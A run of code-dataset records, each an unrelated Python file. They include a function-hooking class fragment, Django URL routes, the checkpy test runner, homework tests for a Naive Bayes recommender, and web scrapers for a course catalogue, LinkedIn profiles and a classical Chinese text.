__HookedList:\n\t\t\t\t\t\t\tgetSettedHookedListWithInstanceVariable(__HookedList,InstanceVariable),\n\t\t\t\t\t\t\tmap(list,__HookingTuplesList)\n\t\t\t\t\t),\n\t\t\t\t\t[self.HookingBeforeTuplesList,self.HookingAfterTuplesList]\n\t\t\t\t)\n\n\t\t\t\t#Set the hooking functions\n\t\t\t\t[self.HookedBeforeFunctionsList,self.HookedAfterFunctionsList]=map(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlambda __HookedTuplesList:\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tSYS.unzip(__HookedTuplesList,[1]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t[self.HookedBeforeTuplesList,self.HookedAfterTuplesList]\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\n\t\t\t\t#Set the hooking functions\n\t\t\t\t[self.HookedBeforeStringsList,self.HookedAfterStringsList]=map(\n\t\t\t\t\t\t\t\t\t\t\t\t\tlambda __HookedBeforeFunctionsList:\n\t\t\t\t\t\t\t\t\t\t\t\t\tmap(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlambda __HookedBeforeFunction:\n\t\t\t\t\t\t\t\t__HookedBeforeFunction.im_func.__repr__() \n\t\t\t\t\t\t\t\tif hasattr(__HookedBeforeFunction,'im_func')\n\t\t\t\t\t\t\t\telse __HookedBeforeFunction.__repr__()\n\t\t\t\t\t\t\t\t\t\t\t\t\t,__HookedBeforeFunctionsList\n\t\t\t\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t\t\t\t[self.HookedBeforeFunctionsList,self.HookedAfterFunctionsList]\n\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\n\t\t\t\t#Debug\n\t\t\t\t'''\n\t\t\t\tprint('Hooker l.158 : hooked functions are setted and they are : ')\n\t\t\t\tprint(str([self.HookedBeforeStringsList,self.HookedAfterStringsList]))\n\t\t\t\tprint('')\n\t\t\t\t'''\n\n\t\t\t\t#Say ok for the setting\n\t\t\t\tself.HookedIsBool=True\n\n\t\t\t#After hooks (integrativ loop)\n\t\t\tfor __HookedAfterFunction in self.HookedAfterFunctionsList:\n\n\t\t\t\t#Check\n\t\t\t\tif _VariablesDict['HookingIsBool']:\n\t\n\t\t\t\t\t#Check\n\t\t\t\t\tif callable(__HookedAfterFunction):\n\t\t\t\t\t\n\t\t\t\t\t\t#Check if it is a unique call or not\n\t\t\t\t\t\tIsCalledBool=True\n\t\t\t\t\t\tif _VariablesDict['HookingUniqueBool']:\n\t\t\t\t\t\t\tif __HookedAfterFunction in _VariablesDict['HookedFunctionsList']:\n\t\t\t\t\t\t\t\tIsCalledBool=False\n\n\t\t\t\t\t\t#Append \n\t\t\t\t\t\t_VariablesDict['HookedFunctionsList'].append(__HookedAfterFunction)\n\n\t\t\t\t\t\t#Check for calling\n\t\t\t\t\t\tif IsCalledBool:\n\n\t\t\t\t\t\t\t#Debug\n\t\t\t\t\t\t\t'''\n\t\t\t\t\t\t\tprint('__HookedAfterFunction is called '+str(\n\t\t\t\t\t\t\t\t\t\t\t\t__HookedAfterFunction))\n\t\t\t\t\t\t\tprint('From Module '+str(inspect.getmodule(__HookedAfterFunction)))\n\t\t\t\t\t\t\tprint('')\n\t\t\t\t\t\t\t'''\n\n\t\t\t\t\t\t\t#Call\n\t\t\t\t\t\t\tOutputVariable=__HookedAfterFunction(*_VariablesList,**_VariablesDict)\n\n\t\t\t\t\t\t\t#Update maybe the _VariablesDict\n\t\t\t\t\t\t\tif type(OutputVariable)==dict:\n\t\t\t\t\t\t\t\t_VariablesDict.update(OutputVariable)\n\n\t\t\t\telse:\n\n\t\t\t\t\t#Return the instance\n\t\t\t\t\treturn InstanceVariable\n\n\t\t\t#Debug\n\t\t\t#print('_HookedFunction is '+str(_HookedFunction))\n\n\t\t\t#Check if it is a unique call or not\n\t\t\tIsCalledBool=True\n\t\t\tif _VariablesDict['HookingUniqueBool']:\n\t\t\t\tif self.HookingFunction in _VariablesDict['HookedFunctionsList']:\n\t\t\t\t\tIsCalledBool=False\n\n\t\t\t#Append \n\t\t\t_VariablesDict['HookedFunctionsList'].append(self.HookingFunction)\n\n\t\t\tif _VariablesDict['HookingIsBool']:\n\n\t\t\t\t#Debug\n\t\t\t\t'''\n\t\t\t\tprint('self.HookingFunction is called '+str(self.HookingFunction))\n\t\t\t\tprint('From Module '+str(inspect.getmodule(self.HookingFunction)))\n\t\t\t\tprint('')\n\t\t\t\t'''\n\n\t\t\t\t#call the method\n\t\t\t\tOutputVariable=self.HookingFunction(*_VariablesList,**_VariablesDict)\n\n\t\t\t\t#Update maybe the _VariablesDict\n\t\t\t\tif type(OutputVariable)==dict:\n\t\t\t\t\t\t_VariablesDict.update(OutputVariable)\n\n\t\t\telse:\n\n\t\t\t\t#Return the instance\n\t\t\t\treturn InstanceVariable\n\n\t\t\t#Before hooks (integrativ loop)\n\t\t\tfor __HookedBeforeFunction in self.HookedBeforeFunctionsList:\n\n\t\t\t\t#Check\n\t\t\t\tif _VariablesDict['HookingIsBool']:\n\t\t\t\t\t\n\t\t\t\t\t#Check\n\t\t\t\t\tif callable(__HookedBeforeFunction):\n\n\t\t\t\t\t\t#Check if it is a unique call or not\n\t\t\t\t\t\tIsCalledBool=True\n\t\t\t\t\t\tif _VariablesDict['HookingUniqueBool']:\n\t\t\t\t\t\t\tif __HookedBeforeFunction in _VariablesDict['HookedFunctionsList']:\n\t\t\t\t\t\t\t\tIsCalledBool=False\n\n\t\t\t\t\t\t#Append \n\t\t\t\t\t\t_VariablesDict['HookedFunctionsList'].append(__HookedBeforeFunction)\n\n\t\t\t\t\t\t#Check for calling\n\t\t\t\t\t\tif IsCalledBool:\n\n\t\t\t\t\t\t\t#Debug\n\t\t\t\t\t\t\t'''\n\t\t\t\t\t\t\tprint('__HookedBeforeFunction is called '+str(__HookedBeforeFunction))\n\t\t\t\t\t\t\tprint('From Module '+str(inspect.getmodule(__HookedBeforeFunction)))\n\t\t\t\t\t\t\tprint('')\n\t\t\t\t\t\t\t'''\n\n\t\t\t\t\t\t\t#Call\n\t\t\t\t\t\t\tOutputVariable=__HookedBeforeFunction(*_VariablesList,**_VariablesDict)\n\n\t\t\t\t\t\t\t#Update maybe the _VariablesDict\n\t\t\t\t\t\t\tif type(OutputVariable)==dict:\n\t\t\t\t\t\t\t\t_VariablesDict.update(OutputVariable)\n\n\t\t\t\telse:\n\n\t\t\t\t\t#Return the Instance\n\t\t\t\t\treturn InstanceVariable\n\n\t\t\t#Return self for the wrapped method call\n\t\t\treturn InstanceVariable\n\n\t\t#Set the name\n\t\tHookedFunction.__name__='Hooked_'+self.HookedFunctionString\n\n\t\t#Give a Pointer to the Hooker\n\t\tHookedFunction.HookerPointer=self\n\n\t\t#Define a represent function for the hooked function\n\t\tdef represent():\n\t\t\tRepresentedString=inspect.getmodule(self.HookingFunction\n\t\t\t\t\t).__name__+'.Hooked_'+self.HookingFunction.__repr__()\n\t\t\treturn RepresentedString\n\n\t\tHookedFunction.__repr__=represent\n\n\t\t#Set\n\t\tself.HookedFunction=HookedFunction\n\n\t\t#Return self\n\t\treturn self\n\n#\n\n","sub_path":"Modules/Init/Modules/_LastDrafts/00c_Hooker/Drafts/Hooker copy 2.py","file_name":"Hooker copy 2.py","file_ext":"py","file_size_in_byte":7992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"387414348","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'reports'\n\nurlpatterns = [\n url(r'^index_report$', views.index_report, name='index_report'),\n url(r'^health_summery_damageloss_dis_report$', views.health_summery_damageloss_dis_report, name='health_summery_damageloss_dis_report'),\n url(r'^health_summery_damageloss_national_report$', views.health_summery_damageloss_national_report, name='health_summery_damageloss_national_report'),\n url(r'^health_summery_damageloss_province_report$', views.health_summery_damageloss_province_report, name='health_summery_damageloss_province_report'),\n\n # fetch data\n url(r'^dl_fetch_report_data$', views.dl_fetch_report_data, name='dl_fetch_report_data'),\n\n #education\n url(r'^education_summary$', views.education_summary, name='education_summary'),\n\n #mining\n url(r'^mining_summary$', views.mining_summary, name='mining_summary'),\n\n #other government services\n url(r'^other_govn_services_summary$', views.other_govn_services_summary, name='other_govn_services_summary'),\n\n #transport land\n url(r'^transport_land_summary$', views.transport_land_summary, name='transport_land_summary'),\n\n #transport rail\n url(r'^transport_rail_summary$', views.transport_rail_summary, name='transport_rail_summary'),\n\n #transport water\n url(r'^transport_water_summary$', views.transport_water_summary, name='transport_water_summary'),\n\n #transport air\n url(r'^transport_air_summary$', views.transport_air_summary, name='transport_air_summary'),\n\n #water_supply\n url(r'^water_supply_summary$', views.water_supply_summary, name='water_supply_summary'),\n\n #power_supply\n url(r'^power_supply_summary$', views.power_supply_summary, name='power_supply_summary'),\n\n #industry_services\n url(r'^industry_services_summary$', views.industry_services_summary, name='industry_services_summary'),\n\n]\n","sub_path":"reports/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"7794820","text":"from checkpy import printer\nfrom checkpy.entities import exception, path\nfrom checkpy.tester import discovery\nfrom checkpy.tester.sandbox import Sandbox\nimport os\nimport subprocess\nimport sys\nimport importlib\nimport multiprocessing\nimport time\n\ndef test(testName, module = \"\", debugMode = False, silentMode = False):\n\tprinter.printer.SILENT_MODE = silentMode\n\n\tresult = TesterResult(testName)\n\n\tpath = discovery.getPath(testName)\n\tif not path:\n\t\tresult.addOutput(printer.displayError(\"File not found: {}\".format(testName)))\n\t\treturn result\n\tpath = str(path)\n\n\tfileName = os.path.basename(path)\n\tfilePath = os.path.dirname(path)\n\n\tif filePath not in sys.path:\n\t\tsys.path.append(filePath)\n\n\ttestFileName = fileName.split(\".\")[0] + \"Test.py\"\n\ttestPaths = discovery.getTestPaths(testFileName, module = module)\n\n\tif not testPaths:\n\t\tresult.addOutput(printer.displayError(\"No test found for {}\".format(fileName)))\n\t\treturn result\n\n\tif len(testPaths) > 1:\n\t\tresult.addOutput(printer.displayWarning(\"Found {} tests: {}, using: {}\".format(len(testPaths), testPaths, testPaths[0])))\n\n\ttestFilePath = str(testPaths[0])\n\n\tif testFilePath not in sys.path:\n\t\tsys.path.append(testFilePath)\n\n\tif path.endswith(\".ipynb\"):\n\t\tif subprocess.call(['jupyter', 'nbconvert', '--to', 'script', path]) != 0:\n\t\t\tresult.addOutput(printer.displayError(\"Failed to convert Jupyter notebook to .py\"))\n\t\t\treturn result\n\n\t\tpath = path.replace(\".ipynb\", \".py\")\n\n\t\t# remove all magic lines from notebook\n\t\twith open(path, \"r\") as f:\n\t\t\tlines = f.readlines()\n\t\twith open(path, \"w\") as f:\n\t\t\tf.write(\"\".join([l for l in lines if \"get_ipython\" not in l]))\n\n\ttesterResult = _runTests(testFileName.split(\".\")[0], path, debugMode = debugMode, silentMode = silentMode)\n\n\tif path.endswith(\".ipynb\"):\n\t\tos.remove(path)\n\n\ttesterResult.output = result.output + testerResult.output\n\treturn testerResult\n\n\ndef testModule(module, debugMode = False, silentMode = False):\n\tprinter.printer.SILENT_MODE = silentMode\n\ttestNames = discovery.getTestNames(module)\n\n\tif not testNames:\n\t\tprinter.displayError(\"no tests found in module: {}\".format(module))\n\t\treturn\n\n\treturn [test(testName, module = module, debugMode = debugMode, silentMode = silentMode) for testName in testNames]\n\ndef _runTests(moduleName, fileName, debugMode = False, silentMode = False):\n\tif sys.version_info[:2] >= (3,4):\n\t\tctx = multiprocessing.get_context(\"spawn\")\n\telse:\n\t\tctx = multiprocessing\n\n\tsignalQueue = ctx.Queue()\n\tresultQueue = ctx.Queue()\n\ttester = _Tester(moduleName, path.Path(fileName).absolutePath(), debugMode, silentMode, signalQueue, resultQueue)\n\tp = ctx.Process(target=tester.run, name=\"Tester\")\n\tp.start()\n\n\tstart = time.time()\n\tisTiming = False\n\n\twhile p.is_alive():\n\t\twhile not signalQueue.empty():\n\t\t\tsignal = signalQueue.get()\n\t\t\tisTiming = signal.isTiming\n\t\t\tdescription = signal.description\n\t\t\ttimeout = signal.timeout\n\t\t\tif signal.resetTimer:\n\t\t\t\tstart = time.time()\n\n\t\tif isTiming and time.time() - start > timeout:\n\t\t\tresult = TesterResult(path.Path(fileName).fileName)\n\t\t\tresult.addOutput(printer.displayError(\"Timeout ({} seconds) reached during: {}\".format(timeout, description)))\n\t\t\tp.terminate()\n\t\t\tp.join()\n\t\t\treturn result\n\n\t\tif not resultQueue.empty():\n\t\t\tp.terminate()\n\t\t\tp.join()\n\t\t\tbreak\n\n\t\ttime.sleep(0.1)\n\n\tif not resultQueue.empty():\n\t\treturn resultQueue.get()\n\n\traise exception.CheckpyError(message = \"An error occured while testing. The testing process exited unexpectedly.\")\n\nclass TesterResult(object):\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tself.nTests = 0\n\t\tself.nPassedTests = 0\n\t\tself.nFailedTests = 0\n\t\tself.nRunTests = 0\n\t\tself.output = []\n\t\tself.testResults = []\n\n\tdef addOutput(self, output):\n\t\tself.output.append(output)\n\n\tdef addResult(self, testResult):\n\t\tself.testResults.append(testResult)\n\n\tdef asDict(self):\n\t\treturn {\"name\":self.name,\n\t\t\t\t\"nTests\":self.nTests,\n\t\t\t \"nPassed\":self.nPassedTests,\n\t\t\t\t\"nFailed\":self.nFailedTests,\n\t\t\t\t\"nRun\":self.nRunTests,\n\t\t\t\t\"output\":self.output,\n\t\t\t\t\"results\":[tr.asDict() for tr in self.testResults]}\n\nclass _Signal(object):\n\tdef __init__(self, isTiming = False, resetTimer = False, description = None, timeout = None):\n\t\tself.isTiming = isTiming\n\t\tself.resetTimer = resetTimer\n\t\tself.description = description\n\t\tself.timeout = timeout\n\nclass _Tester(object):\n\tdef __init__(self, moduleName, filePath, debugMode, silentMode, signalQueue, resultQueue):\n\t\tself.moduleName = moduleName\n\t\tself.filePath = filePath\n\t\tself.debugMode = debugMode\n\t\tself.silentMode = silentMode\n\t\tself.signalQueue = signalQueue\n\t\tself.resultQueue = resultQueue\n\n\tdef run(self):\n\t\tprinter.printer.DEBUG_MODE = self.debugMode\n\t\tprinter.printer.SILENT_MODE = self.silentMode\n\n\t\t# overwrite argv so that it seems the file was run directly\n\t\tsys.argv = [self.filePath.fileName]\n\n\t\tmodule = importlib.import_module(self.moduleName)\n\t\tmodule._fileName = self.filePath.fileName\n\n\t\tif hasattr(module, \"sandbox\"):\n\t\t\twith Sandbox(self.filePath.absolutePath()):\n\t\t\t\tmodule.sandbox()\n\t\t\t\treturn self._runTestsFromModule(module)\n\n\t\treturn self._runTestsFromModule(module)\n\n\tdef _runTestsFromModule(self, module):\n\t\tself._sendSignal(_Signal(isTiming = False))\n\n\t\tresult = TesterResult(self.filePath.fileName)\n\t\tresult.addOutput(printer.displayTestName(self.filePath.fileName))\n\n\t\tif hasattr(module, \"before\"):\n\t\t\ttry:\n\t\t\t\tmodule.before()\n\t\t\texcept Exception as e:\n\t\t\t\tresult.addOutput(printer.displayError(\"Something went wrong at setup:\\n{}\".format(e)))\n\t\t\t\treturn\n\n\t\ttestCreators = [method for method in module.__dict__.values() if getattr(method, \"isTestCreator\", False)]\n\t\tresult.nTests = len(testCreators)\n\n\t\ttestResults = self._runTests(testCreators)\n\n\t\tresult.nRunTests = len(testResults)\n\t\tresult.nPassedTests = len([tr for tr in testResults if tr.hasPassed])\n\t\tresult.nFailedTests = len([tr for tr in testResults if not tr.hasPassed])\n\n\t\tfor testResult in testResults:\n\t\t\tresult.addResult(testResult)\n\t\t\tresult.addOutput(printer.display(testResult))\n\n\t\tif hasattr(module, \"after\"):\n\t\t\ttry:\n\t\t\t\tmodule.after()\n\t\t\texcept Exception as e:\n\t\t\t\tresult.addOutput(printer.displayError(\"Something went wrong at closing:\\n{}\".format(e)))\n\n\t\tself._sendResult(result)\n\n\tdef _runTests(self, testCreators):\n\t\tcachedResults = {}\n\n\t\t# run tests in noncolliding execution order\n\t\tfor test in self._getTestsInExecutionOrder([tc(self.filePath.fileName) for tc in testCreators]):\n\t\t\tself._sendSignal(_Signal(isTiming = True, resetTimer = True, description = test.description(), timeout = test.timeout()))\n\t\t\tcachedResults[test] = test.run()\n\t\t\tself._sendSignal(_Signal(isTiming = False))\n\n\t\t# return test results in specified order\n\t\treturn [cachedResults[test] for test in sorted(cachedResults.keys()) if cachedResults[test] != None]\n\n\tdef _sendResult(self, result):\n\t\tself.resultQueue.put(result)\n\n\tdef _sendSignal(self, signal):\n\t\tself.signalQueue.put(signal)\n\n\tdef _getTestsInExecutionOrder(self, tests):\n\t\ttestsInExecutionOrder = []\n\t\tfor i, test in enumerate(tests):\n\t\t\tdependencies = self._getTestsInExecutionOrder([tc(self.filePath.fileName) for tc in test.dependencies()]) + [test]\n\t\t\ttestsInExecutionOrder.extend([t for t in dependencies if t not in testsInExecutionOrder])\n\t\treturn testsInExecutionOrder\n","sub_path":"checkpy/tester/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"426227792","text":"import unittest2 as unittest\n\nfrom twitter.common.contextutil import temporary_file_path\nfrom twitter.pants.base.run_info import RunInfo\n\n\nclass RunInfoTest(unittest.TestCase):\n def test_run_info_read(self):\n with temporary_file_path() as tmppath:\n with open(tmppath, 'w') as tmpfile:\n tmpfile.write('foo:bar\\n baz :qux quux')\n ri = RunInfo(tmppath)\n self.assertEquals(ri.path(), tmppath)\n\n # Test get_info access.\n self.assertEquals(ri.get_info('foo'), 'bar')\n self.assertEquals(ri.get_info('baz'), 'qux quux')\n self.assertIsNone(ri.get_info('nonexistent'))\n\n # Test dict-like access.\n self.assertEquals(ri['foo'], 'bar')\n self.assertEquals(ri['baz'], 'qux quux')\n\n def test_write_run_info(self):\n with temporary_file_path() as tmppath:\n ri = RunInfo(tmppath)\n ri.add_info('key1', 'val1')\n ri.add_infos(('key2', ' val2'), (' key3 ', 'val3 '))\n self.assertEquals({'key1': 'val1', 'key2': 'val2', 'key3': 'val3'}, ri.get_as_dict())\n\n with open(tmppath, 'r') as tmpfile:\n contents = tmpfile.read()\n self.assertEquals('key1: val1\\nkey2: val2\\nkey3: val3\\n', contents)\n","sub_path":"tests/python/twitter/pants/base/test_run_info.py","file_name":"test_run_info.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"513840457","text":"# Homework 4 solution\n# INFO 4871/5871, Spring 2019\n# Robin Burke\n# University of Colorado, Boulder\n\nfrom naive_bayes import NaiveBayesRecommender\nimport unittest\nimport pandas as pd\n\n\nclass test_NaiveBayes(unittest.TestCase):\n\n _algo = None\n _ratings = None\n _features = None\n\n def setUp(self):\n self._features = pd.read_csv('test_features.csv')\n self._algo = NaiveBayesRecommender(self._features, thresh=2.9, alpha=0.01, beta=0.02)\n\n self._ratings = pd.read_csv('test.csv')\n self._ratings.columns = ['user', 'item', 'rating']\n\n self._algo.fit(self._ratings)\n\n # Test reset\n def test_reset(self):\n nb_table = self._algo._nb_table\n nb_table.reset()\n self.assertEqual(0, nb_table.user_count(1, liked=True), \"Reset did not work.\")\n\n # Test handling for zero scores\n def test_zeros(self):\n # Set all of user 1's counts to zero\n nliked_cond_table1 = self._algo._nb_table.nliked_cond_table[1]\n for key in nliked_cond_table1.keys():\n nliked_cond_table1[key] = 0\n\n self._algo._nb_table.beta = 0\n\n # Should NOT raise divison by zero\n self._algo.score_item(1, 1)\n\n\n # Test values in liked and nliked tables\n # User 1 liked 2 and disliked 2\n # User 3 liked 1 and disliked 2\n def test_liked_tables(self):\n nb_table = self._algo._nb_table\n self.assertEqual(2, nb_table.user_count(1, liked=True), \"User 1 liked count incorrect\")\n self.assertEqual(2, nb_table.user_count(1, liked=False), \"User 1 disliked count incorrect\")\n self.assertEqual(1, nb_table.user_count(3, liked=True), \"User 3 liked count incorrect\")\n self.assertEqual(2, nb_table.user_count(3, liked=False), \"User 3 disliked count incorrect\")\n\n # Test values in linked and nliked cond tables\n # User 1 liked items with Feature D 2 times\n # User 1 disliked items with Feature J 1 time\n def test_cond_tables(self):\n nb_table = self._algo._nb_table\n self.assertEqual(2, nb_table.user_feature_count(1, 'D', liked=True),\n \"User 1 liked feature count D incorrect\")\n self.assertEqual(1, nb_table.user_feature_count(1, 'J', liked=False),\n \"User 1 disliked feature count J incorrect\")\n\n # Test liked and nliked probability calculation\n def test_liked_prob(self):\n nb_table = self._algo._nb_table\n self.assertAlmostEqual(0.5, nb_table.user_prob(1, liked=True), 5,\n \"User 1 liked probability incorrect\")\n # TODO: HOMEWORK 4. Put correct calculated value here\n self.assertAlmostEqual(0.334437, nb_table.user_prob(3, liked=True), 5,\n \"User 3 liked probability incorrect\")\n self.assertAlmostEqual(0.5, nb_table.user_prob(1, liked=False), 5,\n \"User 1 disliked probability incorrect\")\n # TODO: HOMEWORK 4. Put correct calculated value here\n self.assertAlmostEqual(0.0033112, nb_table.user_prob(5, liked=False), 5,\n \"User 5 disliked probability incorrect\")\n\n # Test conditional probability calculations\n def test_cond_prob(self):\n nb_table = self._algo._nb_table\n # TODO: HOMEWORK 4. Put correct calculated value here\n self.assertAlmostEqual(0.990196, nb_table.user_feature_prob(1, 'D', liked=True), 5,\n \"User 1 liked feature prob D incorrect\")\n self.assertAlmostEqual(0.009803922, nb_table.user_feature_prob(1, 'G', liked=False), 5,\n \"User 1 disliked feature prob G incorrect\")\n \n\n # Test score User 3 Item 5\n def test_pred1(self):\n score = self._algo.score_item(3, 5)\n self.assertAlmostEqual(2.67090, score, 5,\n 'User 3 item 5 prediction incorrect')\n\n # Test score User 1 Item 5\n def test_pred2(self):\n score = self._algo.score_item(1, 5)\n# TODO: HOMEWORK 4. Put correct calculated value here\n self.assertAlmostEqual(3.931825, score, 5,\n 'User 1 item 5 prediction incorrect')\n\n # Test score User 5 Item 2\n def test_pred3(self):\n score = self._algo.score_item(5, 2)\n # TODO: HOMEWORK 4. Put correct calculated value here\n self.assertAlmostEqual(6.161364, score, 5,\n 'User 5 item 2 prediction incorrect')\n\n def test_recommend(self):\n recs = self._algo.recommend(3, 2, candidates=[4, 5])\n recs_list = list(recs['item'])\n self.assertEqual(5, recs_list[0], 'Recommendations for user 3 in wrong order.')\n","sub_path":"Naive Bayes Recommender System/test_naive_bayes.py","file_name":"test_naive_bayes.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"139792143","text":"from django.core import paginator\nfrom django.urls import path\n\nfrom Log import views\n\nurlpatterns = [\n path('',views.home,name='home'),\n path('loginpage', views.Loginpage,name='loginpage' ),\n path('BDAloginpage', views.ABDAloginpage, name='BDAloginpage'),\n path('Dashboard', views.DDashboard, name='Dashboard'),\n path('upload/', views.Upload, name='upload'),\n path('Books/', views.BBooks, name='Books'),\n # path('search', views.Search, name='search'),\n path('delete//', views.Delete, name='delete'),\n\n]","sub_path":"Log/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"213191390","text":"import json\nimport requests\nfrom copy import deepcopy\nfrom bs4 import BeautifulSoup\nfrom dataclasses import dataclass, asdict\nfrom typing import List\n\ncontent = requests.get('https://wwwdek.inf.tu-dresden.de/lehre/sose/20/studiengang/studiengang_inf_bach.html').content.decode()\ndocument = BeautifulSoup(content, 'html.parser')\n\nstructure = [e for e in document.recursiveChildGenerator() if e.name in ['h1', 'h2', 'h3', 'table']][2:-1]\n\n\n@dataclass\nclass Module:\n name: str\n code: str = ''\n\n # HTML heading\n level: int = 0\n\n@dataclass\nclass Course:\n # Title of course\n name: str\n # Amount of time; [lecture, exercise, practical]\n hours: List[int]\n # Name of tutors/teachers\n teachers: List[str]\n # Three letter code\n institute: str\n # Unique code for course; only mandatory\n code: str = ''\n # Verbal description of type of examination, only obligatory\n exam: str = ''\n # Master level, only obligatory\n master: bool = False\n # Modules\n modules: List[Module] = None\n\n\ndef unique_objects(objects, key):\n return list({getattr(o, key):o for o in objects}.values())\n\n\ndef parse_hours(hours: str) -> List[int]:\n \"\"\" '2/2/0' => [2,2,0] \"\"\"\n return [int(time) for time in hours.split('/')]\n\ndef parse_teachers(teachers: str) -> List[str]:\n return teachers.split(', ')\n\ndef parse_table(table):\n courses =[]\n rows = table.find_all('tr')\n\n # Skip headers\n rows = rows[1:]\n\n for index, row in enumerate(rows):\n cells_content = [td.text.strip() for td in row.find_all('td')]\n if not cells_content:\n continue\n \n if len(cells_content) is 6:\n # Name, Code, Hours, Language, Teachers, Institute\n name, code, hours, _, teachers, institute = cells_content\n courses.append(Course(\n name=name, \n code=code,\n hours=parse_hours(hours),\n teachers=parse_teachers(teachers),\n institute=institute,\n ))\n else:\n # Name, Hours, Language, Teachers, Institute, Exam, Master\n name, hours, _, teachers, institute, exam, master = cells_content\n courses.append(Course(\n name=name, \n hours=parse_hours(hours),\n teachers=parse_teachers(teachers),\n institute=institute,\n exam=exam,\n master=True if master == \"ja\" else False\n ))\n \n return courses\n\n\n\ndef create_module(tag: str, text: str) -> Module:\n level = int(tag[1])\n if text.startswith('INF'):\n # Module\n code, name = text.split(' ', 1)\n return Module(name=name, code=code, level=level)\n else:\n # Semester\n return Module(name=text, level=level)\n\n\nmodule_path = []\nall_courses = []\n\nfor element in structure:\n tag = element.name\n\n if tag.startswith('h'):\n # Adapt current module path\n text = element.text.strip()\n\n module = create_module(tag, text)\n \n if not module_path:\n module_path = [module]\n else:\n if module.level > module_path[-1].level:\n module_path.append(module)\n elif module.level == module_path[-1].level:\n module_path[-1] = module\n else:\n module_path = [module]\n \n print(f'Level {module.level}: {module_path}')\n \n if tag == 'table':\n module = module_path[1] if len(module_path) > 1 else module_path[0]\n courses = parse_table(element)\n \n for course in courses:\n try:\n if not courses:\n raise StopIteration\n existing_course = next(c for c in all_courses if c.name == course.name)\n # Merge with existing course\n existing_course.modules = unique_objects(deepcopy(module_path) + existing_course.modules, key=\"name\")\n \n except StopIteration:\n # Create new course\n course.modules = deepcopy(module_path)\n all_courses += [course]\n\nwith open('output.json', 'w') as file:\n json.dump([asdict(course) for course in all_courses], file, indent=4, ensure_ascii=False)","sub_path":"scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"55196135","text":"from flask import Flask\nfrom flask import jsonify\nfrom flask import request, Response\nfrom functools import wraps\nimport os\napp = Flask(__name__)\n\nfrom person import scrape_person\nfrom company import scrape_company\n\nLINKEDIN_PERSON_BASE_URL = \"https://www.linkedin.com/in/\"\nLINKEDIN_COMPANY_BASE_URL = \"https://www.linkedin.com/company/\"\nHEADER_AUTH_TOKEN = os.environ.get(\"HEADER_AUTH_TOKEN\")\n\n\ndef check_auth(auth):\n \"\"\"This function is called to check if a username /\n password combination is valid.\n \"\"\"\n return auth == HEADER_AUTH_TOKEN\n\n\ndef authenticate():\n \"\"\"Sends a 401 response for incorrect auth headers\"\"\"\n return Response(\n 'You need proper login credentials to access this page', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth = request.headers.get(\"Authorization\")\n if not auth or not check_auth(auth):\n return authenticate()\n return f(*args, **kwargs)\n return decorated\n\n\n\n@app.route('/health-check/', methods=['GET'])\ndef health_check():\n return jsonify({\"healthy\": True})\n\n\"\"\"\nFormat for linkedin person\nhttps://www.linkedin.com/in/mikesmith/\n\"\"\"\n@app.route('/linkedin/person//', methods=['GET'])\n@requires_auth\ndef person(person_id):\n try:\n res = scrape_person(LINKEDIN_PERSON_BASE_URL + person_id + \"/\")\n return jsonify(res)\n except Exception as e:\n print(e)\n return jsonify({\"errors\":e.message})\n\n\n\"\"\"\nFormat for linkedin company\nhttps://www.linkedin.com/company/drive-capital/\n\"\"\"\n@app.route('/linkedin/company//', methods=['GET'])\n@requires_auth\ndef company(company_id):\n\n url = LINKEDIN_COMPANY_BASE_URL + company_id + \"/\"\n try:\n res = scrape_company(url)\n return jsonify(res)\n except Exception as e:\n print(e)\n return jsonify({\"errors\":e.message})\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", debug=True)\n","sub_path":"linkedin/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195152515","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021/1/29 13:53\n# @Author : 1823218990@qq.com\n# @File : sanzijing.py\n# @Software: PyCharm\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport sys\nsys.path.append(\"../\")\nfrom database.tbl_poetry import TblPoetry\nurl = 'https://sanzijing.bmcx.com/'\ndef main():\n html_base = requests.get(url)\n soup = BeautifulSoup(html_base.text, 'lxml')\n # print(soup)\n m_content = soup.find(\"div\", {\"class\": \"szj_nr\"})\n lis = m_content.find_all(\"li\")\n sanzijing = []\n count = 1\n for li in lis:\n # print(li)\n spans = li.find_all(\"span\", {\"class\": \"\"})\n ps = li.find_all(\"p\", {\"class\": \"\"})\n try:\n gene_dict(spans, ps, count)\n count += 1\n except Exception as e:\n print(e)\n print(spans, ps)\n break\n # return\n\n\ndef gene_dict(spans, ps, count):\n szj = dict()\n content = spans[0].text + \",\" + spans[1].text + \"。\\n\" + spans[2].text + 